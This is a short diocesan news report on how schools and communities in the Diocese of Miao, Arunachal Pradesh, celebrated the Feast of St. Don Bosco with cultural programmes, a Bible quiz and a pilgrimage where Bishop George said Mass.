The Diocese of Miao celebrated the Feast of St. Don Bosco, the Friend of the Youth, with Pilgrimage, colourful cultural items, quiz competitions and wide variety of other events throughout the Diocese on 31st January, 2015.

On the Bicentenary Anniversary of the Birthday of St. Don Bocso, the Salesian communities all over the world have organized various events. Bishop George, a Salesian Prelate himself, too is very happy that the Diocesan communities in Miao have joined in the celebration to remember and celebrate the great contribution by the Salesian Priests in East Arunachal Pradesh.  

The Light of the World School (LWS), Miao, rang in the Feast of Don Bosco with a colourful cultural do on 31st January 2014. The fusion dance of all the local cultures of East Arunachal was a glowing tribute to the Salesian communities serving in this part of our country. 

“St. Don Bosco dedicated his entire life for the youth. The Salesian communities are continuing the legacy of this great Saint of the modern time. We dedicate this cultural programme for all the Salesians working in East Arunachal Pradesh”, said Sr. Reena George, the Headmistress of LWS.

The Newman School, Neotan celebrated the Feast Day of Don Bosco with Bible Quiz and cultural programme with Don Bosco as theme. And St. George School Deomali also marked the celebration of this Feast by making a Pilgrimage to Christ the Light Shrine in Miao. Frs. Linus and Johannes accompanied the 73 pilgrims from St. Ge0rge’s Boarding in Deomali. Bishop George celebrating Mass for the pilgrims appreciated all the students for making pilgrimage to this Shrine in Miao. “May God bless and may St. Don Bosco intercede for you”, he said.
